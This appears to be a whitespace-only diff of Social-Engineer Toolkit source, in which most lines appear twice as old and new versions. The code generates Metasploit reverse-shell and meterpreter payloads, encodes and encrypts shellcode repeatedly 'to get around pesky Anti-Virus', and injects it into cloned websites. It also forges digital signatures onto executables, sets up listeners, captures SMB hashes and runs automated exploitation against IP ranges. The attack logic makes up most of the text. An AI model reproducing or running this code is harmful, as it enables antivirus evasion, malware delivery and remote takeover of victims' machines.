subprocess.Popen("ruby %s/msfencode -e x86/alpha_mixed -i %s/src/program_junk/meterpreter.raw -t raw BufferRegister=EAX > %s/src/program_junk/meterpreter.alpha_decoded" % (path,definepath,definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
# define, this will eventually be all of our payloads
multipyinject_payload = ""
# clean up old file
if os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
os.remove("%s/src/program_junk/meta_config_multipyinjector" % (definepath))
while 1:
if choice1 == "shellcode/multipyinject":
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n 5) Windows Reverse Command Shell\n 6) I'm finished adding payloads.\n")
choice9 = raw_input(setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_tcp]"))
# select default meterpreter reverse tcp
if choice9 == "" or choice9 == "1":
choice9 = "windows/meterpreter/reverse_tcp"
# select reverse https
if choice9 == "2":
choice9 = "windows/meterpreter/reverse_https"
# select reverse http
if choice9 == "3":
choice9 = "windows/meterpreter/reverse_http"
# select all ports
if choice9 == "4":
choice9 = "windows/meterpreter/reverse_tcp_allports"
if choice9 == "5":
choice9 = "windows/shell/reverse_tcp"
# break out of loop, no longer needed
if choice9 == "6": break
shellcode_port = raw_input(setprompt(["4"], "Enter the port number [443]"))
if shellcode_port == "": shellcode_port = "443"
if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject":
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n")
# select payload
choice9 = raw_input(setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_tcp]"))
# select default meterpreter reverse tcp
if choice9 == "" or choice9 == "1":
choice9 = "windows/meterpreter/reverse_tcp"
# select reverse https
if choice9 == "2":
choice9 = "windows/meterpreter/reverse_https"
# select reverse http
if choice9 == "3":
choice9 = "windows/meterpreter/reverse_http"
# select all ports
if choice9 == "4":
choice9 = "windows/meterpreter/reverse_tcp_allports"
# here we prep our meta config to listen on all the ports we want - free hugs all around
filewrite = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "a")
port_check = check_ports("%s/src/program_junk/meta_config_multipyinjector" % (definepath), shellcode_ports)
if port_check == False:
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (choice9,shellcode_port))
filewrite.close()
if choice1 == "shellcode/alphanum":
print_status("Generating the payload via msfpayload and generating alphanumeric shellcode...")
subprocess.Popen("ruby %s/msfpayload %s LHOST=%s %s EXITFUNC=thread R > %s/src/program_junk/meterpreter.raw" % (path,choice9,choice2,portnum,definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
subprocess.Popen("ruby %s/msfencode -e x86/alpha_mixed -i %s/src/program_junk/meterpreter.raw -t raw BufferRegister=EAX > %s/src/program_junk/meterpreter.alpha_decoded" % (path,definepath,definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject":
# define, this will eventually be all of our payloads
multipyinject_payload = ""
# clean up old file
if os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
os.remove("%s/src/program_junk/meta_config_multipyinjector" % (definepath))
while 1:
if choice1 == "shellcode/multipyinject":
print ("\nSelect the payload you want to deliver via shellcode injection\n\n 1) Windows Meterpreter Reverse TCP\n 2) Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager\n 3) Windows Meterpreter (Reflective Injection) Reverse HTTP Stager\n 4) Windows Meterpreter (ALL PORTS) Reverse TCP\n 5) Windows Reverse Command Shell\n 6) I'm finished adding payloads.\n")
choice9 = raw_input(setprompt(["4"], "Enter the number for the payload [meterpreter_reverse_tcp]"))
# select default meterpreter reverse tcp
if choice9 == "" or choice9 == "1":
choice9 = "windows/meterpreter/reverse_tcp"
# select reverse https
if choice9 == "2":
choice9 = "windows/meterpreter/reverse_https"
# select reverse http
if choice9 == "3":
choice9 = "windows/meterpreter/reverse_http"
# select all ports
if choice9 == "4":
choice9 = "windows/meterpreter/reverse_tcp_allports"
if choice9 == "5":
choice9 = "windows/shell/reverse_tcp"
# break out of loop, no longer needed
if choice9 == "6": break
shellcode_port = raw_input(setprompt(["4"], "Enter the port number [443]"))
if shellcode_port == "": shellcode_port = "443"
if validate_ip(choice2) == False:
if choice9 != "windows/meterpreter/reverse_https":
if choice9 != "windows/meterpreter/reverse_http":
print_status("Possible hostname detected, switching to windows/meterpreter/reverse_https")
choice9 == "windows/meterpreter/reverse_https"
# here we prep our meta config to listen on all the ports we want - free hugs all around
filewrite = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "a")
port_check = check_ports("%s/src/program_junk/meta_config_multipyinjector" % (definepath), shellcode_ports)
if port_check == False:
filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (choice9,shellcode_port))
filewrite.close()
if choice9 == "windows/meterpreter/reverse_tcp_allports": portnum = "LPORT=1"
if validate_ip(choice2) == False:
if choice9 != "windows/meterpreter/reverse_https":
if choice9 != "windows/meterpreter/reverse_http":
print_status("Possible hostname detected, switching to windows/meterpreter/reverse_https")
choice9 == "windows/meterpreter/reverse_https"
# meterpreter reverse_tcp
if choice9 == "windows/meterpreter/reverse_tcp": shellcode = metasploit_shellcode(choice9, choice2, portnum)
# meterpreter reverse_https
if choice9 == "windows/meterpreter/reverse_https": shellcode = metasploit_shellcode(choice9, choice2,portnum)
# meterpreter reverse_http
if choice9 == "windows/meterpreter/reverse_http": shellcode = metasploit_shellcode(choice9, choice2,portnum)
# meterpreter tcp allports
if choice9 == "windows/meterpreter/reverse_tcp_allports": shellcode = metasploit_shellcode(choice9, choice2,portnum)
# windows shell reverse_tcp
if choice9 == "windows/shell/reverse_tcp": shellcode = metasploit_shellcode(choice9, choice2, portnum)
if choice9 == "windows/meterpreter/reverse_tcp_allports": portnum = "LPORT=1"
if choice1 == "shellcode/pyinject":
shellcode_port = portnum.replace("LPORT=", "")
# meterpreter reverse_tcp
if choice9 == "windows/meterpreter/reverse_tcp": shellcode = metasploit_shellcode(choice9, choice2, portnum)
# meterpreter reverse_https
if choice9 == "windows/meterpreter/reverse_https": shellcode = metasploit_shellcode(choice9, choice2,portnum)
# meterpreter reverse_http
if choice9 == "windows/meterpreter/reverse_http": shellcode = metasploit_shellcode(choice9, choice2,portnum)
# meterpreter tcp allports
if choice9 == "windows/meterpreter/reverse_tcp_allports": shellcode = metasploit_shellcode(choice9, choice2,portnum)
# windows shell reverse_tcp
if choice9 == "windows/shell/reverse_tcp": shellcode = metasploit_shellcode(choice9, choice2, portnum)
if validate_ip(choice2) == True:
shellcode = shellcode_replace(choice2, shellcode_port, shellcode)
if choice1 == "shellcode/pyinject":
shellcode_port = portnum.replace("LPORT=", "")
# break out of the loop if we are only using one payload else keep on
if choice1 == "shellcode/pyinject": break
multipyinject_payload += shellcode + ","
if validate_ip(choice2) == True:
shellcode = shellcode_replace(choice2, shellcode_port, shellcode)
# get rid of tail comma
if multipyinject_payload.endswith(","):
multipyinject_payload = multipyinject_payload[:-1]
# if we have multiple payloads, use multi injector
if choice1 == "shellcode/multipyinject":
# we first need to encrypt the payload via AES 256
# def encryptAES(secret, data):
print_status("Encrypting the shellcode via 256 AES encryption..")
secret = os.urandom(32)
shellcode = encryptAES(secret, multipyinject_payload)
print_status("Dynamic cipher key created and embedded into payload.")
filewrite = file("%s/src/program_junk/meterpreter.alpha_decoded" % (definepath), "w")
filewrite.write(shellcode)
filewrite.close()
# here we are going to encode the payload via base64
fileopen = file("%s/src/program_junk/meterpreter.alpha_decoded" % (definepath), "r")
data = fileopen.read()
if payloadgen != "solo":
# base64 1
data = base64.b64encode(data)
# encode it again for the fun 2
data = base64.b64encode(data)
# again 3
data = base64.b64encode(data)
# again 4
data = base64.b64encode(data)
# again 5
data = base64.b64encode(data)
# again 6
data = base64.b64encode(data)
# again 7
data = base64.b64encode(data)
# again 8
data = base64.b64encode(data)
# 9
data = base64.b64encode(data)
# 10
data = base64.b64encode(data)
# last one
data = base64.b64encode(data)
#
filewrite = file("%s/src/program_junk/meterpreter.alpha" % (definepath), "w")
filewrite.write(data)
filewrite.close()
if choice1 == "shellcode/alphanum":
print_status("Prepping shellcodeexec for delivery..")
if choice1 == "shellcode/pyinject":
print_status("Prepping pyInjector for delivery..")
# prepping multi pyinjector
if choice1 == "shellcode/multipyinject":
print_status("Prepping Multi-pyInjector for delivery..")
# break out of the loop if we are only using one payload else keep on
if choice1 == "shellcode/pyinject": break
multipyinject_payload += shellcode + ","
# get rid of tail comma
if multipyinject_payload.endswith(","):
multipyinject_payload = multipyinject_payload[:-1]
# if we have multiple payloads, use multi injector
if choice1 == "shellcode/multipyinject":
# we first need to encrypt the payload via AES 256
# def encryptAES(secret, data):
print_status("Encrypting the shellcode via 256 AES encryption..")
secret = os.urandom(32)
shellcode = encryptAES(secret, multipyinject_payload)
print_status("Dynamic cipher key created and embedded into payload.")
filewrite = file("%s/src/program_junk/meterpreter.alpha_decoded" % (definepath), "w")
filewrite.write(shellcode)
filewrite.close()
# here we are going to encode the payload via base64
fileopen = file("%s/src/program_junk/meterpreter.alpha_decoded" % (definepath), "r")
data = fileopen.read()
if payloadgen != "solo":
# base64 1
data = base64.b64encode(data)
# encode it again for the fun 2
data = base64.b64encode(data)
# again 3
data = base64.b64encode(data)
# again 4
data = base64.b64encode(data)
# again 5
data = base64.b64encode(data)
# again 6
data = base64.b64encode(data)
# again 7
data = base64.b64encode(data)
# again 8
data = base64.b64encode(data)
# 9
data = base64.b64encode(data)
# 10
data = base64.b64encode(data)
# last one
data = base64.b64encode(data)
#
filewrite = file("%s/src/program_junk/meterpreter.alpha" % (definepath), "w")
filewrite.write(data)
filewrite.close()
if choice1 == "shellcode/alphanum":
print_status("Prepping shellcodeexec for delivery..")
if choice1 == "shellcode/pyinject":
print_status("Prepping pyInjector for delivery..")
# prepping multi pyinjector
if choice1 == "shellcode/multipyinject":
print_status("Prepping Multi-pyInjector for delivery..")
# here we obfuscate the binary a little bit
random_string = generate_random_string(3,3).upper()
if choice1 == "shellcode/alphanum":
fileopen = file("%s/src/payloads/exe/shellcodeexec.binary" % (definepath), "rb")
if choice1 == "shellcode/pyinject":
fileopen = file("%s/src/payloads/set_payloads/pyinjector.binary" % (definepath), "rb")
if choice1 == "shellcode/multipyinject":
fileopen = file("%s/src/payloads/set_payloads/multi_pyinjector.binary" % (definepath), "rb")
if choice1 == "shellcode/alphanum":
fileopen = file("%s/src/payloads/exe/shellcodeexec.binary" % (definepath), "rb")
if choice1 == "shellcode/pyinject":
fileopen = file("%s/src/payloads/set_payloads/pyinjector.binary" % (definepath), "rb")
if choice1 == "shellcode/multipyinject":
fileopen = file("%s/src/payloads/set_payloads/multi_pyinjector.binary" % (definepath), "rb")
filewrite = file("%s/src/program_junk/shellcodeexec.custom" % (definepath), "wb")
filewrite = file("%s/src/program_junk/shellcodeexec.custom" % (definepath), "wb")
data = fileopen.read()
filewrite.write(data.replace("UPX", random_string, 4))
filewrite.close()
@ -526,30 +526,30 @@ try:
alpha_shellcode = fileopen2.read().rstrip()
data = fileopen.read()
data = data.replace('param name="2" value=""', 'param name="2" value="%s"' % (alpha_shellcode))
if choice1 == "shellcode/multipyinject":
secret = base64.b64encode(secret)
data = data.replace('param name="10" value=""', 'param name="10" value ="%s"' % (secret))
if choice1 == "shellcode/multipyinject":
secret = base64.b64encode(secret)
data = data.replace('param name="10" value=""', 'param name="10" value ="%s"' % (secret))
filewrite.write(data)
# close file
filewrite.close()
# rename file
if choice1 == "shellcode/alphanum":
print_status("Prepping website for alphanumeric injection..")
if choice1 == "shellcode/pyinject":
print_status("Prepping website for pyInjector shellcode injection..")
print_status("Base64 encoding shellcode and prepping for delivery..")
if choice1 == "shellcode/alphanum":
print_status("Prepping website for alphanumeric injection..")
if choice1 == "shellcode/pyinject":
print_status("Prepping website for pyInjector shellcode injection..")
print_status("Base64 encoding shellcode and prepping for delivery..")
subprocess.Popen("mv %s/src/program_junk/web_clone/index.html.new %s/src/program_junk/web_clone/index.html 1> /dev/null 2> /dev/null" % (definepath,definepath), shell=True).wait()
if choice9 == "windows/meterpreter/reverse_tcp_allports":
portnum = "LPORT=1"
choice3 = "1"
if choice9 == "windows/meterpreter/reverse_tcp_allports":
portnum = "LPORT=1"
choice3 = "1"
# UPDATE THE SET CONFIG OPTIONS
update_options("PORT=1")
# UPDATE THE SET CONFIG OPTIONS
update_options("PORT=1")
# here we specify the payload name thats stored later on
choice1 = choice9
# here we specify the payload name thats stored later on
choice1 = choice9
# write out the payload for powershell injection to pick it up if used
filewrite = file("src/program_junk/metasploit.payload", "w")
@ -580,7 +580,7 @@ try:
# check if we don't want to deploy binaries
deploy_binaries = check_config("DEPLOY_BINARIES=")
if deploy_binaries.lower() == "n" or deploy_binaries.lower() == "no":
data = data.replace('param name="8" value="YES"', 'param name="8" value="NO"')
data = data.replace('param name="8" value="YES"', 'param name="8" value="NO"')
filewrite.write(data)
filewrite.close()
subprocess.Popen("mv %s/src/program_junk/web_clone/index.html.new %s/src/program_junk/web_clone/index.html" % (definepath,definepath), stdout=subprocess.PIPE, shell=True)
@ -592,7 +592,7 @@ try:
print_info("Encoding the payload %s times to get around pesky Anti-Virus. [-]\n" % (str(encount)))
encodepayload=subprocess.Popen(r"ruby %s/msfencode < %s/src/program_junk/1msf.exe -e %s -o %s/src/program_junk/msf.exe -t exe -c %s" % (path,definepath,encode,definepath,encount), shell=True).wait()
# subprocess.Popen("cp src/program_junk/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait()
# If option 16 or default then go here
if encode == "MULTIENCODE":
print_info("Encoding the payload multiple times to get around pesky Anti-Virus.")
@ -618,7 +618,7 @@ try:
# define to use digital signature stealing or not
if digital_steal == "ON":
print_status("Digital Signature Stealing is ON, hijacking a legit digital certificate")
print_status("Digital Signature Stealing is ON, hijacking a legit digital certificate")
disitool.CopyDigitalSignature("src/core/digitalsig/digital.signature", "src/program_junk/msf.exe", "src/program_junk/msf2.exe")
subprocess.Popen("cp src/program_junk/msf2.exe src/program_junk/msf.exe 1> /dev/null 2> /dev/null", shell=True).wait()
subprocess.Popen("cp src/program_junk/msf2.exe src/program_junk/msf.exe", shell=True).wait()
@ -632,86 +632,86 @@ try:
# if we have the java attack, multiattack java, and the set interactive shell
if attack_vector == "java" or multiattack_java == "on":
if attack_vector != "set_payload":
if attack_vector != "set_payload":
# pull in the ports from config
port1=check_config("OSX_REVERSE_PORT=")
# if we are using the multiattack, there will be port conflicts, need to scoot it to 8082
if attack_vector == "multiattack":
port1 = "8082"
if check_config("DEPLOY_OSX_LINUX_PAYLOADS=").lower() == "on":
port2=check_config("LINUX_REVERSE_PORT=")
print_status("Generating OSX payloads through Metasploit...")
subprocess.Popen(r"ruby %s/msfpayload osx/x86/shell_reverse_tcp LHOST=%s LPORT=%s X > %s/src/porgram_junk/mac.bin;chmod 755 %s/src/program_junk/mac.bin" % (path,choice2,port1,definepath,definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print_status("Generating Linux payloads through Metasploit...")
subprocess.Popen(r"ruby %s/msfpayload linux/x86/meterpreter/reverse_tcp LHOST=%s LPORT=%s X > %s/src/program_junk/nix.bin" % (path,choice2,port2,definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if multiattack_java == "on":
multiattack.write("OSX="+str(port1)+"\n")
multiattack.write("OSXPAYLOAD=osx/x86/shell_reverse_tcp\n")
multiattack.write("LINUX="+str(port2)+"\n")
multiattack.write("LINUXPAYLOAD=linux/x86/shell/reverse_tcp\n")
# if we are using the multiattack, there will be port conflicts, need to scoot it to 8082
if attack_vector == "multiattack":
port1 = "8082"
if check_config("DEPLOY_OSX_LINUX_PAYLOADS=").lower() == "on":
port2=check_config("LINUX_REVERSE_PORT=")
print_status("Generating OSX payloads through Metasploit...")
subprocess.Popen(r"ruby %s/msfpayload osx/x86/shell_reverse_tcp LHOST=%s LPORT=%s X > %s/src/porgram_junk/mac.bin;chmod 755 %s/src/program_junk/mac.bin" % (path,choice2,port1,definepath,definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
print_status("Generating Linux payloads through Metasploit...")
subprocess.Popen(r"ruby %s/msfpayload linux/x86/meterpreter/reverse_tcp LHOST=%s LPORT=%s X > %s/src/program_junk/nix.bin" % (path,choice2,port2,definepath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
if multiattack_java == "on":
multiattack.write("OSX="+str(port1)+"\n")
multiattack.write("OSXPAYLOAD=osx/x86/shell_reverse_tcp\n")
multiattack.write("LINUX="+str(port2)+"\n")
multiattack.write("LINUXPAYLOAD=linux/x86/shell/reverse_tcp\n")
# try block here
try:
# if they want a listener, start here
if os.path.isfile("%s/src/program_junk/meta_config" % (definepath)):
# if its already created
filewrite=file("%s/src/program_junk/meta_config" % (definepath), "a")
if os.path.isfile("%s/src/program_junk/meta_config" % (definepath)):
# if its already created
filewrite=file("%s/src/program_junk/meta_config" % (definepath), "a")
if not os.path.isfile("%s/src/program_junk/meta_config" % (definepath)):
# if we need to create it
filewrite = file("%s/src/program_junk/meta_config" % (definepath), "w")
if not os.path.isfile("%s/src/program_junk/meta_config" % (definepath)):
# if we need to create it
filewrite = file("%s/src/program_junk/meta_config" % (definepath), "w")
# if there isn't a multiattack metasploit, setup handler
if not os.path.isfile("%s/src/program_junk/multi_meta" % (definepath)):
port_check = check_ports("%s/src/program_junk/meta_config" % (definepath), choice3)
port_check = check_ports("%s/src/program_junk/meta_config" % (definepath), choice3)
if port_check == False:
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD "+choice1+"\n")
filewrite.write("set LHOST 0.0.0.0" + "\n")
if flag == 0:
filewrite.write("set LPORT "+choice3+"\n")
filewrite.write("set ExitOnSession false\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
# config option for using multiscript meterpreter
if meterpreter_multi == "ON":
multiwrite=file("src/program_junk/multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
filewrite.write("set InitialAutorunScript multiscript -rc %s/src/program_junk/multi_meter.file\n" % (definepath))
multiwrite.close()
filewrite.write("exploit -j\n\n")
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD "+choice1+"\n")
filewrite.write("set LHOST 0.0.0.0" + "\n")
if flag == 0:
filewrite.write("set LPORT "+choice3+"\n")
filewrite.write("set ExitOnSession false\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
# config option for using multiscript meterpreter
if meterpreter_multi == "ON":
multiwrite=file("src/program_junk/multi_meter.file", "w")
multiwrite.write(meterpreter_multi_command)
filewrite.write("set InitialAutorunScript multiscript -rc %s/src/program_junk/multi_meter.file\n" % (definepath))
multiwrite.close()
filewrite.write("exploit -j\n\n")
# if we want to embed UNC paths for hashes
if unc_embed == "ON":
filewrite.write("use server/capture/smb\n")
filewrite.write("exploit -j\n\n")
filewrite.write("exploit -j\n\n")
# if only doing payloadgen then close the stuff up
if payloadgen == "solo": filewrite.close()
# Define linux and OSX payloads
if payloadgen == "regular":
if check_config("DEPLOY_OSX_LINUX_PAYLOADS=").lower() == "on":
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD osx/x86/shell_reverse_tcp" +"\n")
filewrite.write("set LHOST "+choice2+"\n")
filewrite.write("set LPORT "+port1+"\n")
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\n\n")
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD linux/x86/shell/reverse_tcp"+"\n")
filewrite.write("set LHOST "+choice2+"\n")
filewrite.write("set LPORT "+port2+"\n")
if linux_meterpreter_multi == "ON":
multiwrite=file("src/program_junk/lin_multi_meter.file", "w")
multiwrite.write(linux_meterpreter_multi_command)
filewrite.write("set InitialAutorunScript multiscript -rc %s/src/program_junk/lin_multi_meter.file\n" % (definepath))
multiwrite.close()
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\n\n")
if check_config("DEPLOY_OSX_LINUX_PAYLOADS=").lower() == "on":
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD osx/x86/shell_reverse_tcp" +"\n")
filewrite.write("set LHOST "+choice2+"\n")
filewrite.write("set LPORT "+port1+"\n")
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\n\n")
filewrite.write("use exploit/multi/handler\n")
filewrite.write("set PAYLOAD linux/x86/shell/reverse_tcp"+"\n")
filewrite.write("set LHOST "+choice2+"\n")
filewrite.write("set LPORT "+port2+"\n")
if linux_meterpreter_multi == "ON":
multiwrite=file("src/program_junk/lin_multi_meter.file", "w")
multiwrite.write(linux_meterpreter_multi_command)
filewrite.write("set InitialAutorunScript multiscript -rc %s/src/program_junk/lin_multi_meter.file\n" % (definepath))
multiwrite.close()
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\n\n")
filewrite.close()
@ -722,8 +722,8 @@ try:
# Catch all errors
except KeyboardInterrupt:
print_warning("Keyboard Interrupt Detected, exiting Payload Gen")
except KeyboardInterrupt:
print_warning("Keyboard Interrupt Detected, exiting Payload Gen")
# finish closing up the remenant files
if attack_vector == "multiattack":
@ -734,4 +734,4 @@ if os.path.isfile("%s/src/program_junk/fileformat.file" % (definepath)):
filewrite.close()
if choice1 == "set/reverse_shell":
if os.path.isfile("src/program_junk/meta_config"): os.remove("src/program_junk/meta_config")
if os.path.isfile("src/program_junk/meta_config"): os.remove("src/program_junk/meta_config")

4
src/core/payloadgen/solo.py
View file

@ -25,8 +25,8 @@ if choice == "YES":
# if we did select the set payload as our option
if os.path.isfile("src/program_junk/set.payload"):
if check_options("PORT=") != 0:
port = check_options("PORT=")
if check_options("PORT=") != 0:
port = check_options("PORT=")
set_payload = file("src/program_junk/set.payload", "r")

12
src/core/payloadprep.py
View file

@ -57,11 +57,11 @@ if os.path.isfile("src/program_junk/interface"):
# Open the IPADDR file
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input(setcore.setprompt("0", "IP address to connect back on for the reverse listener"))
update_options("IPADDR=" + ipaddr)
webserver = ipaddr
update_options("IPADDR=" + ipaddr)
webserver = ipaddr
else:
@ -74,7 +74,7 @@ else:
# grab port options from payloadgen.py
if check_options("PORT=") != 0:
port = check_options("PORT=")
port = check_options("PORT=")
else:
port = raw_input(setcore.setprompt("0", "Port you want to use for the connection back"))
@ -231,13 +231,13 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP":
if os.path.isfile("src/program_junk/web_clone/msf.exe"):
os.remove("src/program_junk/web_clone/msf.exe")
shutil.copyfile("src/payloads/set_payloads/http_shell.binary", "src/program_junk/web_clone/msf.exe")
# if os.path.isfile("src/html/msf.exe"):
# if os.path.isfile("src/html/msf.exe"):
# os.remove("src/html/msf.exe")
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/msf.exe")
if os.path.isfile("src/program_junk/msf.exe"):
os.remove("src/program_junk/msf.exe")
shutil.copyfile("src/program_junk/web_clone/msf.exe", "src/program_junk/msf.exe")
# catch errors, will convert to log later
# catch errors, will convert to log later
except Exception, error:
setcore.log(error)

41
src/core/portscan.py
View file

@ -60,19 +60,19 @@ def scan(host, start, stop):
results[(nhost, nport)] = nstatus
status = results[(host, port)]
if status <> 'CLOSED':
port_open = '%s:%d %s' % (host, port, status)
print_status(port_open)
host_list = host_list + "," + port_open
host_down = 1
port_open = '%s:%d %s' % (host, port, status)
print_status(port_open)
host_list = host_list + "," + port_open
host_down = 1
# if no hosts were up then report host down
if host_down == 0:
return False
return False
# else host is up and return those hosts
if host_down == 1:
time.sleep(1)
#host_list = str(host_list[1:])
return host_list
time.sleep(1)
#host_list = str(host_list[1:])
return host_list
# Copyright (c) 2007 Brandon Sterne
# Licensed under the MIT license.
@ -158,19 +158,18 @@ def validateCIDRBlock(b):
# passed all checks -> return True
return True
# start the actual stuff to grab cidr and port scan
# start the actual stuff to grab cidr and port scan
def launch(cidrBlock,lowport,highport):
print_status("SET is now scanning the IPs specified... please be patient.")
if not validateCIDRBlock(cidrBlock):
print_status("SET is now scanning the IPs specified... please be patient.")
if not validateCIDRBlock(cidrBlock):
# validate its really an ip address if solo
ip_check = is_valid_ip(cidrBlock)
if ip_check != False:
print_status("CIDR notation not specified. Trying single IP address.")
scan(cidrBlock, int(lowport), int(highport))
return host_list
else:
print_warning("Invalid IP Address, try again.")
ip_check = is_valid_ip(cidrBlock)
if ip_check != False:
print_status("CIDR notation not specified. Trying single IP address.")
scan(cidrBlock, int(lowport), int(highport))
return host_list
else:
printCIDR(cidrBlock,lowport,highport)
return host_list
print_warning("Invalid IP Address, try again.")
else:
printCIDR(cidrBlock,lowport,highport)
return host_list

1176
src/core/scapy.py
View file

File diff suppressed because it is too large Load diff

1404
src/core/set.py
View file

File diff suppressed because it is too large Load diff

842
src/core/setcore.py
View file

File diff suppressed because it is too large Load diff

1
src/core/ssl/PoC_SSL.py
View file

@ -40,4 +40,3 @@ def test(HandlerClass = SecureHTTPRequestHandler,
if __name__ == '__main__':
test()

72
src/core/ssl/setssl.py
View file

@ -14,48 +14,48 @@ os.chdir("CA/")
# create necessary files
subprocess.Popen("echo '01' > serial;touch index.txt", shell=True).wait()
filewrite=file("openssl.cnf", "w")
filewrite.write("""#
# OpenSSL configuration file.
#
filewrite.write("""#
# OpenSSL configuration file.
#
# Establish working directory.
dir = .
[ req ]
default_bits = 1024 # Size of keys
default_keyfile = key.pem # name of generated keys
default_md = md5 # message digest algorithm
string_mask = nombstr # permitted characters
distinguished_name = req_distinguished_name
# Establish working directory.
dir = .
[ req ]
default_bits = 1024 # Size of keys
default_keyfile = key.pem # name of generated keys
default_md = md5 # message digest algorithm
string_mask = nombstr # permitted characters
distinguished_name = req_distinguished_name
[ req_distinguished_name ]
# Variable name Prompt string
#---------------------- ----------------------------------
0.organizationName = Organization Name (company)
organizationalUnitName = Organizational Unit Name (department, division)
emailAddress = Email Address
emailAddress_max = 40
localityName = Locality Name (city, district)
stateOrProvinceName = State or Province Name (full name)
countryName = Country Name (2 letter code)
countryName_min = 2
countryName_max = 2
commonName = Common Name (hostname, IP, or your name)
commonName_max = 64
[ req_distinguished_name ]
# Variable name Prompt string
#---------------------- ----------------------------------
0.organizationName = Organization Name (company)
organizationalUnitName = Organizational Unit Name (department, division)
emailAddress = Email Address
emailAddress_max = 40
localityName = Locality Name (city, district)
stateOrProvinceName = State or Province Name (full name)
countryName = Country Name (2 letter code)
countryName_min = 2
countryName_max = 2
commonName = Common Name (hostname, IP, or your name)
commonName_max = 64
# Default values for the above, for consistency and less typing.
# Variable name Value
#------------------------------ ------------------------------
0.organizationName_default = The Sample Company
localityName_default = Metropolis
stateOrProvinceName_default = New York
countryName_default = US
# Default values for the above, for consistency and less typing.
# Variable name Value
#------------------------------ ------------------------------
0.organizationName_default = The Sample Company
localityName_default = Metropolis
stateOrProvinceName_default = New York
countryName_default = US
[ v3_ca ]
basicConstraints = CA:TRUE
subjectKeyIdentifier = hash
[ v3_ca ]
basicConstraints = CA:TRUE
subjectKeyIdentifier = hash
authorityKeyIdentifier = keyid:always,issuer:always""")
# close editing of the file
filewrite.close()
subprocess.Popen("openssl req -new -x509 -extensions v3_ca -keyout private/cakey.pem -out newcert.pem -days 3650 -config ./openssl.cnf", shell=True).wait()
subprocess.Popen("cp private/cakey.pem newreq.pem;cp *.pem ../", shell=True).wait()
subprocess.Popen("cp private/cakey.pem newreq.pem;cp *.pem ../", shell=True).wait()
os.chdir(definepath)

68
src/fasttrack/autopwn.py
View file

@ -11,47 +11,47 @@ import pexpect
# this will load the database
def prep(database, ranges):
print "\n"
setcore.PrintStatus("Prepping the answer file based on what was specified.")
# prep the file to be written
filewrite=file("src/program_junk/autopwn.answer", "w")
setcore.PrintStatus("Using the " + database + "sql driver for autopwn")
filewrite.write("db_driver " + database + "\r\n")
setcore.PrintStatus("Autopwn will attack the following systems: " + ranges)
filewrite.write("db_nmap " + ranges + "\r\n")
filewrite.write("db_autopwn -p -t -e -r\r\n")
filewrite.write("jobs -K\r\n")
filewrite.write("sessions -l\r\n")
filewrite.close()
setcore.PrintStatus("Answer file has been created and prepped for delivery into Metasploit.\n")
print "\n"
setcore.PrintStatus("Prepping the answer file based on what was specified.")
# prep the file to be written
filewrite=file("src/program_junk/autopwn.answer", "w")
setcore.PrintStatus("Using the " + database + "sql driver for autopwn")
filewrite.write("db_driver " + database + "\r\n")
setcore.PrintStatus("Autopwn will attack the following systems: " + ranges)
filewrite.write("db_nmap " + ranges + "\r\n")
filewrite.write("db_autopwn -p -t -e -r\r\n")
filewrite.write("jobs -K\r\n")
filewrite.write("sessions -l\r\n")
filewrite.close()
setcore.PrintStatus("Answer file has been created and prepped for delivery into Metasploit.\n")
def launch():
""" here we cant use the path for metasploit via setcore.meta_path. If the full path is specified it breaks
